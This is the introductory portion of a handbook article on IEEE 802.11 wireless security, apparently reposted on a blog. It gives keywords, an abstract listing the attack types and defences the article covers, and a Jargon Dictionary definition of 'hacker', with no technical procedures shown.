This article is
scheduled to appear in “The Handbook of Information Security”,
Key Words
IEEE 802.11, wireless spoofing, cracking WEP, forged Deauthentication,
rogue/ Trojan access points, session hijacking, war driving.
Abstract
This article describes IEEE 802.11-specific hacking techniques
that attackers have used, and suggests various defensive measures. We describe
sniffing, spoofing and probing in the context of wireless
networks. We describe how SSIDs can be determined, how a
sufficiently large number of frames can be collected so that WEP can be
cracked. We show how easy it is to cause denial-of-service through jamming
and through forged disassociations and deauthentications. We also
explain three man-in-the-middle attacks using wireless networks. We
give a list of selected open-source tools. We summarize the activity
known as war driving. We conclude the article with several recommendations
that will help improve security at a wireless deployment site.
Wireless networks broadcast their packets using radio frequency or
optical wavelengths. A modern laptop computer can listen in. Worse,
an attacker can manufacture new packets on the fly and persuade wireless
stations to accept his packets as legitimate.
We use the term hacking as described below.
hacker n. [originally,
someone who makes furniture with an axe] 1. A person who
enjoys exploring the details of programmable systems and how to stretch their
capabilities, as opposed to most users, who prefer to learn only the minimum
necessary. 2. One who programs enthusiastically (even
obsessively) or who enjoys programming rather than just theorizing about programming. 3. A
person capable of appreciating hack value. 4. A person who is
good at programming quickly. 5. An expert at a particular
program, or one who frequently does work using it or on it; as in `a Unix
hacker'. (Definitions 1 through 5 are correlated, and people who fit them
congregate.) 6. An expert or enthusiast of any kind. One might
be an astronomy hacker, for example. 7. One who enjoys the
intellectual challenge of creatively overcoming or circumventing
limitations. 8. [deprecated] A malicious meddler
who tries to discover sensitive information by poking around. Hence `password
hacker', `network hacker'. The correct term for this sense is cracker.
From The Jargon Dictionary http://info.astrian.net/jargon/
This article describes IEEE 802.11-specific hacking techniques
that attackers have used, and suggests various defensive measures. It is not an
overview of security features proposed in WPA or IEEE 802.11i. We do
not consider legal implications, or the intent behind such hacking, whether
malevolent or benevolent. The article’s focus is in describing
techniques, methods, analyses and uses in ways unintended by the
designers of IEEE 802.11.
No comments:
Post a Comment
Note: Only a member of this blog may post a comment.